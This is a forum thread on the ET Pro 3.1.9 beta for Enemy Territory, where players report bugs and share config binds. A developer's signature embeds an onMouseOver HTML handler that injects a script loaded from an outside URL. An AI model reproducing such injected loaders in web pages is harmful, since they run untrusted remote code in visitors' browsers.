ET Pro 3.1.9 Public Beta Release

Official ET Pro announcements here...

Moderators: Forum moderators, developers

Pangea

Post by Pangea »

The timer continues when the game is paused. Don't know whether that's intended, but I'd say it's something that should be fixed. ;)
EagleReloaded

Post by EagleReloaded »

Well spotted.

Could the spawn timer be tied into the mission clock? Sometimes it seems like it is and others it isn't, depending on when you hit your bind and how close to the spawn second it was. If you hit your bind to start/sync the timer and you do it midway through a second, it will count down on 28.5, 27.5 and so on when compared to the other two clocks. I know the difference this makes is almost negligible, it's just slight overlooked errors like this have caused problems in the past so I figured I'd mention it.

Edit: Just tried out the fireteam and the location names, my god that's going to make it easier to make sure my teammates are where they're meant to be in defense. Nice stuff.
Some people play tennis, I erode the human soul.
skillzilla

Post by skillzilla »

what does b_beginround, b_endround do and how to use them
Lagger

Post by Lagger »

skillzilla wrote:what does b_beginround, b_endround do and how to use them
well, you could type this in your config:

Code: Select all

set b_endround "statsall; say I am teh pwnage, n00bs!!!111oneeleven"
at the end of every round, this will give you a statsdump, and taunt your enemies with lightning speed. they will ph33r j00r 1337ness, and bow down before you. :roll:
skillzilla

Post by skillzilla »

Lagger wrote:
skillzilla wrote:what does b_beginround, b_endround do and how to use them
well, you could type this in your config:

Code: Select all

set b_endround "statsall; say I am teh pwnage, n00bs!!!111oneeleven"
at the end of every round, this will give you a statsdump, and taunt your enemies with lightning speed. they will ph33r j00r 1337ness, and bow down before you. :roll:
i cant get that to work :<
Lagger

Post by Lagger »

skillzilla wrote:i cant get that to work :<
that's odd, it works here - the statsall and say parts anyway.....
EagleReloaded

Post by EagleReloaded »

I know beginround works here, haven't tested endround.
Bouaap

Post by Bouaap »

todd` wrote:My suggestions:

6) just noticed this.. if someone has colors in their name, the colors will change the color of the last ) and : and the location..
That's why all nicks should end with "^7". It's what I do anyway.
wargle.c
ouroboro

Post by ouroboro »

lol, yeh, i'd be willing to bet that could be fixed with a single instance of "^7" in the code.

oh well
Please direct all gameplay-changing feature requests here.
deej

Post by deej »

Well the server actually does that [appending ^7] for sv_hostname so it's in the code somewhere.
Our servers now run on 64 bit steroids. Point your ET to:
- Forgotten Ground StopWatch Server with occasional wolfrof 1
- Fraggle Rock ETPub Server - Mix up ET/UT & Duke Nukem
Dogwood

Post by Dogwood »

This bugfix test version has been out there for quite a while now.
Any news on the version's release, or even the next full version, 3.2?
BBr|ET Clan Leader
BroadbandReports.com
EagleReloaded

Post by EagleReloaded »

Edit: Found it, all vsays are broken like that, normal messages are fine. The userinfo output on map start still suffers, as does '/rcon status'.

The tooltip for 'weapalt' Reloads (Main Menu > ETPro > Config > Next > 'weapalt' Reloads) has got 'secondary' spelt wrong (yes I know I'm pedantic...).

When you rename yourself using colours, if you hit up in the console to the command you used, and hit home to try and change the colours, the cursor goes off the edge of the screen, and is offset about 4 to the left of the character you're actually editing.

Something else that might be good to change is the process of renaming via the menu. As is, if you're using an alias or your name just gets reset, if you go try to edit it manually through the menu, it updates the cvar after every keypress, so every character you backspace over results in a rename, and then every character you type results in a rename, and you get kicked for having changed your name too many times. Perhaps make it so the cvar isn't updated until you hit Back?
Rain

Post by Rain »

todd` wrote:6) just noticed this.. if someone has colors in their name, the colors will change the color of the last ) and : and the location..
The yellow : is intentional (it's always been that way to distinguish vsays), although I thought I added an implicit ^7 after the name when I redid the chat code...
EagleReloaded wrote:The tooltip for 'weapalt' Reloads (Main Menu > ETPro > Config > Next > 'weapalt' Reloads) has got 'secondary' spelt wrong (yes I know I'm pedantic...).
Blame Im2weak4u. I ran out of correction fluid. ;)
EagleReloaded wrote:When you rename yourself using colours, if you hit up in the console to the command you used, and hit home to try and change the colours, the cursor goes off the edge of the screen, and is offset about 4 to the left of the character you're actually editing.
This is an engine bug that's been around since at least Q3.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
gotenks

Post by gotenks »

btw it's off the number of color changes*2
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
>>steven!

Post by >>steven! »

whats all this about hitting home to move to the colour to change :?
UK Elite Guard
#ukeg on Quakenet
www.ukeliteguard.co.uk
Est. Jan 2002